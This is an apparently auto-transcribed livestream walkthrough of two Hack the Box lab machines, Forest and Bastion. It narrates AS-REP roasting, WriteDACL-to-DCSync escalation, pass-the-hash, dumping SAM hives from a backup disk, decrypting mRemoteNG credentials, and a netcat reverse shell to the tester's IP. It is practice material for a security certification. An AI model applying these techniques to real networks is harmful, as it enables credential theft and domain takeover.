Perfect. Stream running. So let's get into it. Hack the Box have got their Easy July out, which means that these boxes are free to play and they're also retired. So the first one we're going to get on with is Forest. I've added it to my host file, so might just turn music off, to be honest, and we'll see. Interesting. Ten 161. Ah, forgot to tell it which file to output to. Awesome, so we'll run the scan and then we'll see what comes back and get on with it from there. This is my first ever live stream of Hack the Box, so we'll just see how it goes. I'll probably end up talking to myself for the whole time, but that's absolutely fine by me. So we've got a load of ports running on this box. I'll just make a note of it off the stream so you guys can't see that, but I've got Google Docs open on my right screen so I can just keep notes of what's going on. Interestingly, it didn't return too much information. We can see it's the server 2016 and it's running things like SMB. So my SMB notes, my methodology is to start with SMB client HTTP and issue like this. Okay, so we can't see if there are any interesting shares we can connect to without authentication. So we're going to do enum for Linux against forest.htp and just see what comes back. So enum for Linux kind of does SMB enumeration for when you're running it on Kali or any Linux host, instead of having to be on a Windows host to do this kind of stuff. So instantly here, what can we see? We see some interesting stuff. We've got some user accounts which we're going to make a note of, because the chances are we're going to need one of those users when we become user. We can see here again this SVC, Alfresco, Sebastian, Lucinda, Mark, and it's managed to pick up Santi as well. Did we get Santi down here? Yeah, we did. It's just on the second page. Cool. So we get some information about the password length, password policy. Fine, the script's kind of broken. Okay, so what has that told us? It's told us that there are these users here. Which is cool. So, what can we do here? I guess another thing we can do is use the in packet get np users, and we know Hack the Box normally runs on htb.local, which is their domain, and we don't know a password yet. We need to make a users file, so it's Sebastian, Lucinda, SVC Alfresco, Andy, Mark, and Santi. And I wish I'd get MP users http.local no pass users file is users and the DC IP, because we saw during our enumeration that this box was running simple DNS, so we also saw DNS admins was a group on the box, so we're going to assume is the domain controller, and we'll just give it a whirl and see what happens. What have I done wrong here? Oh, maybe it needs to be the IP. Nope. Oh, uses file spot wrong. Of course. So here we've managed to get a hash for SVC alfresco, the Kerberos ticket, I believe. So let's make a note of that. Cool. Get MP users. So what this script does, it attempts to list and get TGTs for those users that have the property do not require Kerberos pre-authentication set. For those users with such configuration, John the Ripper output will be generated so you can send it for cracking. So we know this hash SVC alfresco hash. We know it's already in John format, so which we can just do is John. And let me check my hacking notes. I've got a big GitHub repo of notes of how to use tools and stuff, because I always forget. John SVC alfresco hash word list user share word lists cookie, and let's just see. What do you mean? Another typo, lovely. And let's see if we can crack that ticket. And it's managed to crack it, and the password is service. So let's make a note of that. We now know the password for SVC alfresco is service. So we should be able to do. Let's see if this works. Forest, HTTP. Cool, so none of the shares are writable for PS exec. SMB exec. Helps if I don't get rid of all the stuff. Again, cool, access denied. So we know this user's password. We can't use psexec.py and we can't use smbexec.py, so it's not super easy to get to root as this user. I'm just going to make a note of this get MP users thing so I don't forget. Get MP users. Lovely. So I've made a note of that. So what can we do? Let's have a look at what other stuff was open. Okay, cool. So we now know that this user doesn't require pre-auth to be set, which is cool. And now we have to think about how we can get in and have a look at what ports were open. So if I is there like a text editor? Awesome. I'm gonna write this out so you guys can see. These are the ports that were open on Forest. So we had Kerberos, blah blah blah, RPC, LDAP, Now let me just do a full port scan of Forest, because we haven't got RDP, psexec.py and smbexec.py didn't work, so we know our user doesn't have perms to do that and therefore elevate to system. So we'll just let this run and see if there were any ports that the initial scan didn't pick up with the default ports that it runs at. Let's have a look. One that I quite like is WinRM. I believe it runs on like 5895. We'll just wait and see for this to return. But if that's there, then we can use either WinRM to get it coming. And there we go, 5985. So 5388135139. Cool. So it's these three that we didn't pick up on the first run through. So now what do we know? We know the username, SVC Alfresco, we know the password, service, and we know the box that it can connect to. So let's try Evil WinRM. Username is SVC Alfresco, password is service. Check back to my notes. So guys, honestly, keeping your notes to hand is super helpful, because it means you can just reference it real quick. And -I 10.10.10.161. Let's see if we can get a shell over WinRM. Awesome. So there we go. We have a user level shell as this dude. So, and there is user.txt. So get the hash for that, and punch it into hack the box so that we know that we've owned it and we can carry on. So that's how straightforward it is to get a user level shell if you've got an account who doesn't have Kerberos pre-authentication set. Should probably do it for all your accounts if you haven't, and that get npusers.py script in Inpacket is super helpful for finding that stuff out. Cool. So now that we're in as this user, we're going to have to find a way to privilege escalate. What can we do to privilege escalate? We can do a few things. We can net users, and this will confirm to us the users that are here. It actually shows us all those health mailboxes and stuff as well. We can net local group administrators. Interesting. So we can see we are part of a domain. Obviously we know that because we got the creds out of the domain controller, but the only domain admin is the administrator account. So what else can we do? Let's get WinPs onto the box and let it run and see what we can see. So enumeration, SMB server.py, like that, and that pretty much opens this share, my tools enumeration share, as an SMB share. So I should be able to now just do 192.168. Oh no, what is my hack the box IP? Good question. I am going to turn off my screen for a sec, just so you guys can't see what my IP is, what my other IP addresses are. Cool. Let me add that to the top of this file, and then I'll share my screen again. So what can I do over here? Again, // might be /sam /winpeas.exe. And I should see a connection in here, so I can see it connected. Okay, and WinPeas is running. So this is a super handy way of being able to run stuff off disk as well, run it in memory, so we know that even if there was AV running, it wouldn't detect this on disk, so like if you download it, it won't be able to get rid of your file. You're just running in memory over the wire, and it's outputting stuff for us. So let's have a look and see. Some passwords, environment variables, no. Lap's not installed, credential card not installed, no AV detected. So we could have downloaded it onto the box, but we didn't. Anything interesting on this box? So our user is a domain user, everyone uses, compatible access, remote management users, this organization service accounts, NTLM auth, which is what we abused. There is an administrator user. Oh shite. Okay. See, this is where we have an issue. It is writing out more than the console will hold. So we should have written this to a file, pulled it back to our Kali box, and then had a flick through to see what is on there. Is there anything here that shows us anything interesting before we run it again and get it to write to a file? Interesting. So it looks like someone has been on this box with sharphound already, which kind of suggests we should also be looking to get Bloodhound on the box and run it to see what permissions we have. Now, to save time doing that, cd completed forest. Hello? Oh cool, this must be a box that I haven't done on this Kali box before. So we will have to do that. Sharphound. We've got sharphound.ps1 here. Yeah. So we can run. Nope. 10, 10, 14, 177. 4 sharphound usage. Do I have Bloodhound on here? No. God damn it. Okay, so to save time, because this will take a little while, you will just have to believe me when I say I have done this box before and I ran Bloodhound. In fact, I was able to do it a different way. We didn't have to get sharphound onto the box because we've got some credentials. So there's bloodhound.py, and we can simply run bloodhound.py. Let's see our history, service, all next content. Right, okay. Let me go here. looks like I need to put this in. Cool. So now we should be able to run this from our box. Amazing. So let's try this again. I want to be in this directory. So Bloodhound Python. SVC alfresco service all name server 10.10.10.161 domain hackthebox.local. So it found the domain. It's connected to the LDAP server. Found one domain in the forest. Couldn't resolve the SID. Found 31 users in 75 groups, and hopefully it outputted. Awesome. So it has outputted a load of stuff for us, and this we could then import into Bloodhound. I haven't got it installed on my host computer either, but pretty much what this will tell us is that SVC alfresco has write DACL perms on http.local. So write DACL prevesc. Let's have a look on this blog. By default, the permission security group write DACL permission on the domain object where the exchange was installed. Write DACL allows, let me expand this a little bit for you guys. So the write DACL permission allows us to identify and modify permissions to the designated object. In other words, modify the ACL, which means by being a member of this group, we are able to escalate our permissions to that of a domain admin. To exploit this, we added a user account we obtained earlier to the Exchange Trusted Subsystem group. Logged on again because security group members just only loaded during this. So let's double check in here. Are we a member of this group already? Has someone done this on the box? Exchange Trusted Subsystem. I don't see it. Cool. So we need to do that. Then log in again, become a member of the group, and then modify the ACL of the domain. More about the prevesc can be found on this GitHub page. Now this is all by the GUI. Here we go, this is what we want. So we should be able to just paste this. Cool. So that should have just added our user to that thing. At the moment it says we're not, so let's quit. Exit. And then log in again. And we are now a member of the Exchange Windows Permissions group, which you'll be able to see we weren't before. So pretty much that's the first step in this privilege escalation. Reglog to update the groups in your token to allow yourself DS replication get changes and DS replication get changes all. So again, we're just gonna run these commands that they've listed out here for us. Okay, not good. So we need to edit this. Let's just connect back again. Got my all. We lost access to that group, so we need to add ourselves back into that group to begin with. Bosh, bosh, bosh. Log off, and then log in. And we've got those permissions again. And then with this script, make a new one. Did we see the output here? AD HTTP .local. Let's go with that. Do I need to change anything else? Doesn't look like. Oh yeah, down here. HTTP .local. Lovely. Now let's see if this works. Can't find the drive. Name AD does not exist. Still part of this group this time. Interesting. So ACL, should we get ACL AD DC equals HTTP DC equals local? That worked this time. Okay. Let's run it from the top and try again. And the last thing it doesn't like, it says access denied when we try to set the ACL. It shouldn't have been, because we should have those. So again, what has gone wrong here? We've got get our current user, id.user, user.sid, write guard, writes guard for the extended write, yes, blah blah blah, which we did before, identity for sid, ad writes extended write, type allow, none. Inheritance type, ACL add ACE. Did we get down as far as that? Second comment. This 137 blah. That inheritance type again. ACL to add access from ACE, and then set ACL object. Well, I don't think it has worked, but we will try the next step in the exploit anyway, which is to use secret dump. No. Okay. Let's have a look. So we've got us, we've got Sebastian, we've got public, we've got administrator. Let's try making a new user so they don't wipe our perms, because I have a feeling it's something to do with stopping people being able to jump onto this account and running the exploit straight away. So if I just set a password variable, then create a new local user and add that user to the group. So so my user has that Exchange Windows perm. Let's exit out of this. Okay, so now my thing isn't working. Let's do this. And so the password I set was that, and the user submit. Doesn't look overly promising. I think I also needed to be in remote management users. So let's do that. Add AD group member, identity, remote management users, members, sampling. Cool. So now we're in the group that should allow us to log in with WinRM. Perfect. And we have a user which is in Exchange Windows permissions, blah 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 blah. So let's try and run this again, see if it makes a difference. Still didn't like that initial. I don't understand, eh? And this time we don't get permission denied, which is awesome. So now if I try running secrets dump as our user, obviously that didn't work, but if we try this user, we've been able to dump all of the hashes from the DC because we've given ourselves permission and set the ACL so that our user has access to them. So we can take these out and put them in a file. Nano secrets. Cool. So obviously the one we real care about is this guy here, the administrator user. Now one thing that's good about this is we should be able to do either WinRM issue administrator /h this /I 10.10.10.61 invalid hash format, so it only needs the second part. And we've been able to pass the hash and log in as administrator. the CD here, CD desktop, dear, and there we go. So that is Forest completed. What was the vulnerability? It was vulnerable to pretty much our user had this write DACL perm, which meant that it could write the ACLs against the domain controller, pretty much allowing us to tell it that we can read all the hashes and do a DC sync, which is what secret stump does. It was able to grab all of the NTLM hashes from the domain controller, and then without ever having to crack it, you can just use EvilWinRM to pass the hash and log in as administrator. I hope that was helpful. Let's have a look at what the next box on the list is. If it will load for me, hack the box. The chat is open. If anyone else is here, feel free to say hello. I am planning to do more of these hacking and hack along sessions over the next few weeks. So yeah, come and join in. I'm setting my OSCP in a couple of weeks. Hopefully that will go well. We shall see. But yeah, my lab time ran out yesterday, so I'm just doing this to keep myself up to scratch. My VPN, don't care, notes, don't care. Lovely. So the next box is Bastion. And what IP address is Bastion? Let's have a look. Ten, 1, 3, 4. And we're on our standard scripts and versioning mmap. Get rid of this, and we'll use it for the output of this next mmap scan. See what's going on in the world. Oh, it's already run. Lovely job. So we can see it's running OpenSSH for Windows 7.9, and again we've got RPC is open. So as before, we will try to do a couple of things. We will try and do SMB thingamabob, and then we'll do enum for Linux. So we can see a list of shares here for us. I'm going to make a note of these because I've never done this box before, so let's do this all properly. Hack the box /bastion. Copy this out. 10, 10, 10. 1, 3, 4. Cool, so your SMB client shows us the standard stuff that we can normally see. Is backups normally there? I want to say no. So let's try SMB client -n 1234 bastion/backups. So we need the double backslash for the share as well. So let's get node.txt. And just see what that says. It says admins, please don't transfer the entire backup locally. The VPN to the subsidiary office is too slow. Fine. CD, so those files are both empty. God damn it. Cool, so there's nothing really of interest on there apart from we know there is a VPN that allows them to connect in, which is worth making a note of. Let's do our enum for Linux, bastion.hdb, and just see if we can enumerate any users or anything like that that could be of interest. Nothing yet. So, what do we do here then? This says server 2019, this says 2008 R2 and this says 7.9. Let's see, just quickly with nmap, if there's any super simple vulnerabilities that are of interest to us. I think the answer is probably no, but we'll just double check that. False and error. So cool. Let's connect back because I have a feeling, yeah, I was right. This is actually a directory. So we can see L4mpje-pc, so I'm going to assume lampje is a user maybe. pc is the name of the computer. Is this real small on the live stream? Let me double check. Name of it. Oh dear god, that's tiny. And real bad quality. Man, you can't see shit on that. Goodness me. That's still real bad quality. Alright, I'm gonna end this live stream for now. I didn't realise how poor it is. I will try and work out why that is. Oh no, it's good quality, it's just my internet. Lovely job. Cool, so this should look a bit better now, because it's a bit bigger. And in here we can see, what can we see? We can see backup, okay, let's try. Maybe that'll work. Lovely. So we see a load of stuff in here. We've got backup specs. We've got VHD, virtual hard drives. which are interesting. So let's see what we can do. If I make a directory of and then I should be able to mount. Does it have a way I can mount it at all? I think you can mount over SMB. Let me try. Let's go into my notes. I should be able to. TCFS HTTP/ and then what's the path? We've got backups because that's the SMB share we're connecting to, and then Windows image backup /L4 MPG PC /to documents how to box easy July Bastion MPPC, and then cool. So I've mounted it in here. Now we can have a look at the VHD. So if I go CD backup, what can I do on the VHD? I should be able to just go into it, right? So CD 9B 9FC3. Let's try this one first. It's not a directory. So I mounted only up to a certain point because I'm an idiot. After an MPG PC, we wanted backup 2019 1822 124351. Hoping this works, and then I want this VHD. What's that wake up? Obviously I don't want to do it from there. I'll do it from in here. So then I should be able to do this. Error, not a directory. No, I was right the first time. Cool. So we've got it mounted, CD backup, and I need to look up how to view files in VHD. VHD on Kali. This, and I should be able to do something like this. Is bastion.hb slash and then the name of VHD. This one. It's not worked at all. Still gets marks, I haven't got it installed. Cool, we'll just let this run through, and then we should be able to see what's going on. Probably better if I had my webcam on the other screen, to be honest, because I look at the screen most of the time anyway. So let's see how that looks over there. Yeah, that's way better. Awesome. So we'll just let this crash out because my Kali box is buggered, and then we can carry on with mounting the VHD and seeing what's actually on it. I'm hoping for some juiciness, but I have no idea what I'm going to be looking for. Yeah, don't transfer the entire backup locally, that's why we are mounting it instead. Whenever this crashes, it should allow us to see it. Lovely, keep going, errors at a first, don't care. Done some stuff. Can I zoom this in at all? Select font, is that going to let me select the font size? that's a bit big. Bugger it. It's all good in the hood. It's not done yet. It actually seems to be working. I'm going to lower this font size ever so slightly. Oh, it's just a bit silly. Once this is installed, we should be able to guest mount that thingy, and then we can see what's going on with the VHD. If we have a virtual hard drive, things we should be able to do from that, if it's not encrypted, is find credentials that we can dump, stuff like that. Cool. So errors, blah blah blah. Now let's guest mount it here. Access to Bastion, HTTP, Lampy, PC, backup 2019 0222 124 351 blah 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 .vhd. File does not exist. Okay, it does, but whatever. Let me double check I read how this works correctly. Okay, so cool. So now let's do this properly. We have to mount. We have to do the initial mount of Lampy PC to Lampy PC. And then we have to do guest mount, and we're gonna stick it at VHD. And the file that we're actually looking for is for blah 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 blah. And then this guy. And this should mount the VHD. The note on this medium page says the mounting process may take some time. After it completes, navigate to the location you mounted the VHD to, and it should be there. So we'll just see how that goes. Just want to check this isn't filling up my hard drive while we do it. How much have I given it? Oh, I've given it 80 gig, which should be good. I can't imagine Hack the Box is going to make you guest mount a huge file like that, but you never know. Copying files from host file system, blah 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 blah. Sweet. So now it looks like it's pulling all these files over to us, which is real nice. Cool. So now you can see we've got the virtual hard drive mounted. CD users, CD alpha and PGE, so my suspicions were correct. CD desktop, Okay. User.txt on here, no. So user box, which is fine. So no user flag. Locate. I just want to check locate work. Doesn't work on a mounted VHD. Okay, interesting. Places we can look on a Windows box that we might care about. Try Windows. System 32. I don't want to show these possibilities. Let's go in the config and see if there's anything we can see here. There's the sound file right there. So there's also the system file. So we should be able to dump things. Let's cp sam2 documents in the box. Easy July Bastion. And we'll also copy system. And now we've got these files. We've got SAM and we've got system. We should be able to use let me find it. Cool. So we've got SAM and we've got system. We're hoping they're Hive files. We should be able to do sam2 dump system sam. Sam dump 2. Okay, cool. So from that we can see the administrator is disabled, the guest user is disabled, but we've got the hash for LabG. Super cool. So you'll bear with me 2 seconds, guys. I'm just gonna make a note on my Word document to say what we've done. After mounting, we find SAM and system in Windows system 32/config, pulling these back to carry on running. SAM to dump on that. We get these. So let's look at what was open. Fine. Check crack station, see if it's a known NTLM password that's been cracked, and it is. Oh, now I Control S. Cool. So now we've got credentials for this box, which is pretty neat. So what is our next step? We'll try psexec.py. LabG. Bastion.htb. I feel like that needs more information. No, it doesn't. Okay. So we can't run psexec. SMB exec access denied, which is fine. We still have got credentials, so how else can we connect? How else can we connect? What is open? Oh fuck. SSH is open. SSH. L4 MPJE at bastion.htb. Yeah, I'm okay with the fingerprint because I don't care. And punch in this password. And we're in. Okay, cool. So, note yourself. You can SSH in with above creds. Now, there was no user.txt, but that was of a backup, so cool. This is pretty sweet. I've never used SSH on a Windows box before, so that's something new for me. Let's submit a flag for owning the user. I reckon that was not too easy, but it was a good rating. So now we have the Privesk. Some basic stuff we can run while we're on here. System info. Let us know the architecture. Oh no, access denied. What are the chances? I think it's here. You can see, yep, there's just 2 users. Clear works, which is amazing. I love when we don't have a reverse shell. It's just a normal SSH shell because it's real easy and nice to work with. Okay. Net user. So our user is a member of users group, which is no fun. Okay. I think again I will use my trusty tools cd integration SMB server py soundbang. Nope, that's not gonna work. Connect. Nope. Again, that's not my IP address, is it, guys? Come on, Sam. Oh god. I want to get my IP address back. Cool. It's this. Not the IP address I used for the CP Labs, which is no longer active. Awesome, so it connects to our thing with our user, and again, this should be running WinPeace over the network in memory without having to put it to the box, just in case antivirus is running. So, basic checks to see if it's vulnerable to a kernel exploit. Access denied, brilliant. What do we know from this? ND64. Fine. Again, I don't understand why it grabs the empty.exe, that's not right. No AV. PowerShell history. Interesting. Could be worth having a look at. So user, nothing of interest. Yeah, fine. I already know this. something interesting. I have a feeling this is what we already got. 261. So I think it's worth checking out this file just to see if there's anything interesting. Someone's tried to run a part shell, reverse shell. So PS exec. We tried that, it didn't work before. However, we are now on the box. What could we do? I've got an idea what we could do, or what we could try and do at least. There's this. 10, 14, 77. I'm gonna have to blank my screen for a second because I don't want you guys to see all of my OCP spoilers while I try and find out how I've done this in the past. But I literally did it yesterday or the day before, so I'm going to have a look and see if it works here. One thing that could be interesting actually, in this old console history log, I'm not sure if I want to go off this because it looks like it's someone else's enumeration, but I see M remote NG is present on the box. Let me see if I can try my way of doing Perverse, and if it doesn't work then we can come back to it. Cool. So I've closed those notes because there could be a few ways of doing this. Just typing this out so you guys can't see anything, and then we'll go from there. Cool. Let me reopen my screen. And let's carry on. So, I might be able to run something like this, psxx64.exe against localhost, accept EULA. Now my user is L4MPJE. My password is BUREAULAMPJE 10.10.14.177. Oh, this could be NC is not in here. Cool. nc.exe 10.10.14.177 80. And in here, let's do nc lbmp 80. I just want to see if this works, guys. So, explaining what this is doing. I've got a SMB server running, I've got PSExec.exe on the SMB server. I want to run that against the local Bastion host as my user, and what I want it to run is nc.exe there we go, that's what I've missed. I want netcat to run cmd.exe to my IP over 480. Awesome. That didn't work. Why didn't that work? 110.14 177. Yes, exact 64.exe. Oh, I know why. Because I've also not got. Kill 3, 4, 6, 7, 8. SMB server. Let's try again. So yeah, going back to it. It's running PSExec. So it ran PSExec, but it wasn't able to elevate me to system, which is fine. I wasn't sure if it would or not. It was just worth a try. There we go. Let's close that out. Also interesting that that works. I'm going to make a note of this for future in case I ever need to run PSExec and I don't get access to AUI. Over SMB. Awesome. Okay, so that PSExec didn't work. CLS. So what do we have here? CD program files. Dir. CD. CLS dir. CDM So, I have worked with remote NG in the past. I am very aware that there is an XML file that will probably be in here, which will have credentials. Let me have a go as to where those credentials normally lie. Remote NG credentials file. XML. CD user profile / app data / roaming / remote ng. Cool. So here we go. Type conf cons.xml. That's not very nice to look at. But it's okay. Things we really care about is this. This one's the one we care about. Look, administrator against localhost. Okay, fine. So what can we do to decrypt this? Because we've got protected. So I have a feeling there is something that we can do. Let's see, remote credential decoder online. Decrypting remote ng passwords. Remote ng decrypt.py. Lovely. Okay, so I need to get this file off of this box. Copy item conf 10.14.177 be helpful if I could spell. And that file should now be where I'm hosting my SMB server. Move confcons to what directory am I trying to work in? I'm trying to work in this guy. Oh, no, yeah. Cool, so we've got the XML and we've got this guy's Python script. I think I should just be able to take this Python script in its raw format. Python decoder, and what do the steps say? They say to do this, and then do -esh for the file, and confcons.xml. Back check failed. Interesting. So what's it complaining about in decrypt and verify? Backcheck failed. Line 45. Cipher.decrypt and verify. Cipher tag. Okay, I can see it also accepts strings, so can I just do Python decoder string. Incorrect padding. Is it written in Python 3? No. So it is meant to be run Python 3. Let's try the top one with the file. complaining about the Mac chip or not. So what am I doing wrong? Let's have a look. Usage, Python 3, decoder, file, compounds. Is there something in the file that I'm missing? Python is complaining with the string. Python 3 incorrect heading. Oh, god damn it. It's my copy paste fault. I missed an equals sign. It's a double equals. And that simply gives us the password. So perhaps now, if I go back here, I go to do my psexec stuff like I did before. Oh no. God damn it, okay. So password is that. User is administrator. 10, 14, 177. 10, 14, 177. Let's see, easy. So that's still running, yep, lovely. Now that we've got the admin scripts, that should run psexec as admin. It's asking for the password, that's interesting. I gave it the password, but let's go again. Ah, that's why. No. Copy it, and paste it, and go. And we should, in a second, get a psexec connection from the administrator user to our reverse shell listener. Drum roll, please. Come on. And see that exe errored. Why is it errored? And see that exe exists. It worked earlier. Let's try it again. And if that doesn't work again, I'll try another way. I want this way to work because I like it, but realistically it's not overly sensible. I'm overthinking the situation because I've realised there's another way we can do this super easy. I want a system level shell. But I will make do with the admin one if I have to, because that's fine too. I think after this I'm gonna end the stream. Cool, that's obviously not working. But yeah, that was how we read that box. Time to submit the flag in here. And that's box 2 of the Easy July boxes that I have routed today. We've done Forest and then we've done Bastion on this stream. It took us an hour and a half to do both, which is pretty decent, I think. Yeah, interesting. I have learned, what have I learned from these? I've learned how to mount virtual hard drive. I've learned to stop overthinking things because I kept trying to run PSExec when I could have just SSH'd on. So yeah, I think that's been a productive couple of hours. I hope you guys have enjoyed hagging along with me. I'm going to head to the gym. Have a good rest of your weekend, and I'll see you guys later.